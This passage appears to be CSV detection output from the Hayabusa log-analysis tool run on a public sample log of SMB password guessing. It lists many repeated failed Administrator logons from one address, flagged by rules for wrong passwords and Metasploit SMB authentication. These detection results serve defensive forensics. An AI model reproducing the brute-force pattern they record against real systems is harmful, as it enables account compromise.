Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
